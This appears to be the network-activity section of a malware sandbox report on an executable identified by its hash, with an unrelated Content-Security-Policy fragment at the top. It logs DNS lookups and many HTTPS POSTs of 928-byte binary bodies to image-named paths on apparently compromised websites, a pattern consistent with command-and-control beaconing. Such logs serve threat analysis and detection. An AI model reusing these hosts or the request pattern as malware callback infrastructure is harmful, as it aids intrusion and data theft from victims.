https://www.google-analytics.com https://c.disquscdn.com/ https://cdnjs.cloudflare.com/ data: https://platform.twitter.com/ https://www.gstatic.com/ https://widget.intercom.io/ https://js.intercomcdn.com/ https://www.wufoo.com/scripts/embed/form.js https://mlk0wjrutmkk.i.optimole.com/ https://skauci-pomorze.b-cdn.net/ https://beacon-v2.helpscout.net/ https://yoast.com/ https://www.google.com/ ; img-src https://*.gravatar.com/ https://c.disquscdn.com 'self' 'unsafe-inline' https://*.googlesyndication.com https://secure.gravatar.com https://s.yimg.com https://*.tile.openstreetmap.org https://*.staticflickr.com https://referrer.disqus.com https://a.disquscdn.com https://s-static.ak.facebook.com https://*.static.am5.pl https://static.am5.pl https://*.wp.com https://ssl.google-analytics.com https://s-ssl.wordpress.com https://www.google-analytics.com https://s.w.org https://ps.w.org data: https://*.googleusercontent.com/ https://*.shortpixel.ai/ blob: 
https://demo2wpopal.b-cdn.net/ https://en.wordpress.com/ https://cdn.gtranslate.net/ https://mlk0wjrutmkk.i.optimole.com/ https://skauci-pomorze.b-cdn.net/ https://bravepresets.b-cdn.net/ ; style-src 'self' 'unsafe-inline' https://a.disquscdn.com https://fonts.googleapis.com https://secure.gravatar.com https://*.static.am5.pl https://static.am5.pl https://*.disqus.com https://js-agent.newrelic.com https://*.wp.com https://c.disquscdn.com/ https://www.gstatic.com/ https://skauci-pomorze.b-cdn.net/ ; font-src 'self' data: https://fonts.gstatic.com https://themes.googleusercontent.com https://*.static.am5.pl https://static.am5.pl https://*.wp.com https://wordpress.com https://static2.sharepointonline.com/ https://skauci-pomorze.b-cdn.net/ ; frame-src 'self' https://jetpack.wordpress.com https://www.youtube.com https://www.facebook.com https://*.addthis.com https://accounts.google.com https://www.google.com https://calendar.google.com https://disqus.com https://*.facebook.com https://s-static.ak.facebook.com https://*.static.am5.pl https://static.am5.pl https://*.soundcloud.com https://*.disqus.com https://widgets.wp.com https://googleads.g.doubleclick.net data: https://platform.twitter.com/ https://syndication.twitter.com/ ; object-src 'none' ; frame-ancestors 'self'; connect-src 'self' https://media.getbrave.io/api/ https://cors.getbrave.io/;
    • flag-us
      DNS
      www.kaminscy.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.kaminscy.com
      IN A
      Response
      www.kaminscy.com
      IN CNAME
      kaminscy.com
      kaminscy.com
      IN A
      51.75.34.224
    • flag-us
      DNS
      www.kaminscy.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.kaminscy.com
      IN A
      Response
      www.kaminscy.com
      IN CNAME
      kaminscy.com
      kaminscy.com
      IN A
      51.75.34.224
    • flag-pl
      GET
      https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      51.75.34.224:443
      Request
      GET /uploads/images/xvrcakvaetjk.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.kaminscy.com
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:55:58 GMT
      Content-Type: text/html
      Content-Length: 548
      Connection: close
      Vary: Accept-Encoding
    • flag-us
      DNS
      224.34.75.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      224.34.75.51.in-addr.arpa
      IN PTR
      Response
      224.34.75.51.in-addr.arpa
      IN PTR
      s1.am5.pl
    • flag-us
      DNS
      boompinoy.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      boompinoy.com
      IN A
      Response
    • flag-us
      DNS
      webcodingstudio.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      webcodingstudio.com
      IN A
      Response
      webcodingstudio.com
      IN A
      91.239.233.22
    • flag-us
      DNS
      webcodingstudio.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      webcodingstudio.com
      IN A
      Response
      webcodingstudio.com
      IN A
      91.239.233.22
    • flag-ua
      POST
      https://webcodingstudio.com/uploads/tmp/zplemxvx.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      91.239.233.22:443
      Request
      POST /uploads/tmp/zplemxvx.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: webcodingstudio.com
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/8.1.27
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://webcodingstudio.com/wp-json/>; rel="https://api.w.org/"
    • flag-us
      DNS
      22.233.239.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      22.233.239.91.in-addr.arpa
      IN PTR
      Response
      22.233.239.91.in-addr.arpa
      IN PTR
      skm261.hostsila.org
    • flag-us
      DNS
      onlybacklink.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      onlybacklink.com
      IN A
      Response
      onlybacklink.com
      IN A
      208.100.26.245
    • flag-us
      DNS
      onlybacklink.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      onlybacklink.com
      IN A
      Response
      onlybacklink.com
      IN A
      208.100.26.245
    • flag-us
      POST
      https://onlybacklink.com/news/tmp/wcytkdtb.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      208.100.26.245:443
      Request
      POST /news/tmp/wcytkdtb.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: onlybacklink.com
      Response
      HTTP/1.1 404 Not Found
      Server: nginx/1.14.0 (Ubuntu)
      Date: Tue, 02 Apr 2024 13:56:00 GMT
      Content-Type: text/html
      Content-Length: 580
      Connection: close
    • flag-us
      DNS
      victoriousfestival.co.uk
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      victoriousfestival.co.uk
      IN A
      Response
      victoriousfestival.co.uk
      IN A
      35.177.75.40
    • flag-gb
      POST
      https://victoriousfestival.co.uk/include/graphic/wcfo.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      35.177.75.40:443
      Request
      POST /include/graphic/wcfo.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: victoriousfestival.co.uk
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:01 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: close
      Location: https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif
    • flag-us
      DNS
      www.victoriousfestival.co.uk
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.victoriousfestival.co.uk
      IN A
      Response
      www.victoriousfestival.co.uk
      IN A
      35.177.75.40
    • flag-gb
      GET
      https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      35.177.75.40:443
      Request
      GET /include/graphic/wcfo.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.victoriousfestival.co.uk
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:02 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/8.1.27
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.victoriousfestival.co.uk/wp-json/>; rel="https://api.w.org/"
      Access-Control-Allow-Origin: *
      Strict-Transport-Security: max-age=15768000; includeSubDomains
    • flag-us
      DNS
      40.75.177.35.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      40.75.177.35.in-addr.arpa
      IN PTR
      Response
      40.75.177.35.in-addr.arpa
      IN PTR
      ec2-35-177-75-40.eu-west-2.compute.amazonaws.com
    • flag-us
      DNS
      40.75.177.35.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      40.75.177.35.in-addr.arpa
      IN PTR
      Response
      40.75.177.35.in-addr.arpa
      IN PTR
      ec2-35-177-75-40.eu-west-2.compute.amazonaws.com
    • flag-us
      DNS
      245.26.100.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      245.26.100.208.in-addr.arpa
      IN PTR
      Response
      245.26.100.208.in-addr.arpa
      IN PTR
      ip245.208-100-26.static.steadfastdns.net
    • flag-us
      DNS
      levdittliv.se
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      levdittliv.se
      IN A
      Response
      levdittliv.se
      IN A
      188.114.96.2
      levdittliv.se
      IN A
      188.114.97.2
    • flag-us
      POST
      https://levdittliv.se/content/tmp/twxa.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      188.114.96.2:443
      Request
      POST /content/tmp/twxa.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: levdittliv.se
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Tue, 02 Apr 2024 13:56:02 GMT
      Transfer-Encoding: chunked
      Connection: close
      Cache-Control: max-age=3600
      Expires: Tue, 02 Apr 2024 14:56:02 GMT
      Location: https://fitforme.com/sv-se/vara-multivitaminer/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PxYk%2BMwS%2BaROab0Jh%2BloD%2FsWmR171dOtwqiFLN6xp52wZUBqQqv%2BK0MNC3jo8PcwNWi1ROSrF4X7UR0IMWlrpNF3WvH53tj5%2FL2fg95pJ%2BbwGfrWMvQ%2BrFLtx8mOGvnk"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 86e151ebac137761-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      fitforme.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      fitforme.com
      IN A
      Response
      fitforme.com
      IN A
      172.67.75.185
      fitforme.com
      IN A
      104.26.9.199
      fitforme.com
      IN A
      104.26.8.199
    • flag-us
      GET
      https://fitforme.com/sv-se/vara-multivitaminer/
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      172.67.75.185:443
      Request
      GET /sv-se/vara-multivitaminer/ HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: fitforme.com
      Response
      HTTP/1.1 200 OK
      Date: Tue, 02 Apr 2024 13:56:02 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      CF-Ray: 86e151ed1ea7652a-LHR
      CF-Cache-Status: DYNAMIC
      Cache-Control: s-maxage=5, stale-while-revalidate
      Set-Cookie: NEXT_LOCALE=sv-se; HttpOnly; Secure; SameSite=Lax; Priority=High; Domain=fitforme.com; Expires=Wed Apr 02 2025 13:56:02 GMT+0000 (Coordinated Universal Time); Path=/;
      Vary: Accept-Encoding
      x-nextjs-cache: STALE
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5Y0eBXkNsUx6clnGuU4dULdvZZyyuLBSq1ETbK7qzxgPQZdXjHEyPnpnJdtQRBrj7InzgRRD7uM4MVGP9Z1Vphp43cMJbuFgqcMuaecXyYiNFicQ5q9j5Wuil2JTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
    • flag-us
      DNS
      2.96.114.188.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.96.114.188.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      rosavalamedahr.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      rosavalamedahr.com
      IN A
      Response
      rosavalamedahr.com
      IN A
      35.215.118.92
    • flag-us
      POST
      https://rosavalamedahr.com/static/tmp/dwms.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      35.215.118.92:443
      Request
      POST /static/tmp/dwms.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: rosavalamedahr.com
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:04 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-Cache-Enabled: True
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      Link: <https://rosavalamedahr.com/wp-json/>; rel="https://api.w.org/"
      X-Httpd: 1
      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
      X-Proxy-Cache-Info: DT:1
    • flag-us
      DNS
      185.75.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      185.75.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      92.118.215.35.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      92.118.215.35.in-addr.arpa
      IN PTR
      Response
      92.118.215.35.in-addr.arpa
      IN PTR
      92.118.215.35.bc.googleusercontent.com
    • flag-us
      DNS
      dupontsellshomes.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      dupontsellshomes.com
      IN A
      Response
      dupontsellshomes.com
      IN A
      70.40.220.182
    • flag-us
      POST
      https://dupontsellshomes.com/data/pictures/agzfktulhq.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      70.40.220.182:443
      Request
      POST /data/pictures/agzfktulhq.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: dupontsellshomes.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 13:56:05 GMT
      Server: Apache
      Content-Length: 315
      Content-Type: text/html; charset=iso-8859-1
    • flag-us
      DNS
      braffinjurylawfirm.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      braffinjurylawfirm.com
      IN A
      Response
      braffinjurylawfirm.com
      IN A
      104.21.95.31
      braffinjurylawfirm.com
      IN A
      172.67.142.162
    • flag-us
      POST
      https://braffinjurylawfirm.com/uploads/pics/ulgz.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      104.21.95.31:443
      Request
      POST /uploads/pics/ulgz.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: braffinjurylawfirm.com
      Response
      HTTP/1.1 302 Found
      Date: Tue, 02 Apr 2024 13:56:07 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      location: https://braffinjurylawfirm.com/
      expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      link: <https://braffinjurylawfirm.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d9HQOhbx3rMt6QQKICAh%2B5S1xjlVF52pwgLQRgU535gqzjJpweR5YdvjHZgaoKDv3zEegCsWGnauUQ4Hweh5bTKA8lRicZeVRlS4SlY9tAplsCSw%2FGDQnUo4X8mmOmi2htD96%2BQCB5u"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 86e15202095e93f6-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      182.220.40.70.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      182.220.40.70.in-addr.arpa
      IN PTR
      Response
      182.220.40.70.in-addr.arpa
      IN PTR
      box2136.bluehost.com
    • flag-us
      GET
      https://braffinjurylawfirm.com/
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      104.21.95.31:443
      Request
      GET / HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: braffinjurylawfirm.com
      Response
      HTTP/1.1 200 OK
      Date: Tue, 02 Apr 2024 13:56:08 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      link: <https://braffinjurylawfirm.com/wp-json/>; rel="https://api.w.org/", <https://braffinjurylawfirm.com/wp-json/wp/v2/pages/6>; rel="alternate"; type="application/json", <https://braffinjurylawfirm.com/>; rel=shortlink
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyhcS9ecMABuSGOycHrsgiSg57IdNHIh9huGrrAGu%2FawT2M2r0fkGQo%2B2auQpqd61JxVup3wF4nNUZueV6XrIisI%2B0Je7qcOeD46KyI2raPhwblphKyOYJ75Uo6usNtrQgTDUPqBIJLE"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 86e152091b5676d7-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      31.95.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      31.95.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      xtptrack.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      xtptrack.com
      IN A
      Response
      xtptrack.com
      IN A
      35.190.31.54
    • flag-us
      POST
      https://xtptrack.com/data/pictures/pugigjqlcx.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      35.190.31.54:443
      Request
      POST /data/pictures/pugigjqlcx.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: xtptrack.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:08 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 261
      Connection: close
      X-Content-Type-Options: nosniff
      Location: https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg
      X-CDN-C: static
      X-SG-CDN: 1
      X-Proxy-Cache-Info: DT:1
      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
    • flag-us
      DNS
      www.xtptrack.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.xtptrack.com
      IN A
      Response
      www.xtptrack.com
      IN A
      34.120.190.48
    • flag-us
      GET
      https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      34.120.190.48:443
      Request
      GET /data/pictures/pugigjqlcx.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.xtptrack.com
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:09 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Pragma: no-cache
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-Cache-Enabled: True
      Link: <https://www.xtptrack.com/wp-json/>; rel="https://api.w.org/"
      Set-Cookie: PHPSESSID=1299c1a213d6e11f60cf005955a2399c; path=/
      X-Content-Type-Options: nosniff
      X-Httpd: 1
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      X-CDN-C: static
      X-SG-CDN: 1
      X-Proxy-Cache: MISS
      X-Proxy-Cache-Info: 0 NC:000000 UP:SKIP_CACHE_SET_COOKIE
      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
    • flag-us
      DNS
      54.31.190.35.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      54.31.190.35.in-addr.arpa
      IN PTR
      Response
      54.31.190.35.in-addr.arpa
      IN PTR
      54.31.190.35.bc.googleusercontent.com
    • flag-us
      DNS
      gemeentehetkompas.nl
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      gemeentehetkompas.nl
      IN A
      Response
    • flag-us
      DNS
      alsace-first.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      alsace-first.com
      IN A
      Response
      alsace-first.com
      IN A
      213.186.33.4
    • flag-us
      DNS
      alsace-first.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      alsace-first.com
      IN A
      Response
      alsace-first.com
      IN A
      213.186.33.4
    • flag-fr
      POST
      https://alsace-first.com/content/images/tgwk.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      213.186.33.4:443
      Request
      POST /content/images/tgwk.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: alsace-first.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 13:56:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Server: Apache
      X-Powered-By: PHP/5.6
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.alsace-first.com/wp-json/>; rel="https://api.w.org/"
    • flag-us
      DNS
      48.190.120.34.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      48.190.120.34.in-addr.arpa
      IN PTR
      Response
      48.190.120.34.in-addr.arpa
      IN PTR
      48.190.120.34.bc.googleusercontent.com
    • flag-us
      DNS
      4.33.186.213.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      4.33.186.213.in-addr.arpa
      IN PTR
      Response
      4.33.186.213.in-addr.arpa
      IN PTR
      cluster003.ovh.net
    • flag-us
      DNS
      woodleyacademy.org
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      woodleyacademy.org
      IN A
      Response
      woodleyacademy.org
      IN A
      208.95.242.12
    • flag-us
      POST
      https://woodleyacademy.org/uploads/temp/kzkszsprcr.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      208.95.242.12:443
      Request
      POST /uploads/temp/kzkszsprcr.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: woodleyacademy.org
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 13:56:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.4.21
      Set-Cookie: PHPSESSID=e330ff4cef0881e2fc07bc2363bf4c8b; path=/
      Pragma: no-cache
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Strict-Transport-Security: max-age=15724800; includeSubDomains
    • flag-us
      DNS
      12.242.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      12.242.95.208.in-addr.arpa
      IN PTR
      Response
      12.242.95.208.in-addr.arpa
      IN PTR
      naneoveranet
    • flag-us
      DNS
      12.242.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      12.242.95.208.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      sportsmassoren.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      sportsmassoren.com
      IN A
      Response
      sportsmassoren.com
      IN A
      94.231.106.24
    • flag-dk
      POST
      https://sportsmassoren.com/content/pics/zixrzirane.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      94.231.106.24:443
      Request
      POST /content/pics/zixrzirane.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: sportsmassoren.com
      Response
      HTTP/1.1 301 Moved Permanently
      Connection: close
      content-type: text/html
      content-length: 707
      date: Tue, 02 Apr 2024 13:56:14 GMT
      server: LiteSpeed
      location: https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif
      x-nf-server: Yes
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • flag-us
      DNS
      olejuulsmuskelterapi.dk
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      olejuulsmuskelterapi.dk
      IN A
      Response
      olejuulsmuskelterapi.dk
      IN A
      185.21.41.131
    • flag-us
      DNS
      olejuulsmuskelterapi.dk
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      olejuulsmuskelterapi.dk
      IN A
      Response
      olejuulsmuskelterapi.dk
      IN A
      185.21.41.131
    • flag-dk
      GET
      https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      185.21.41.131:443
      Request
      GET /content/pics/zixrzirane.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
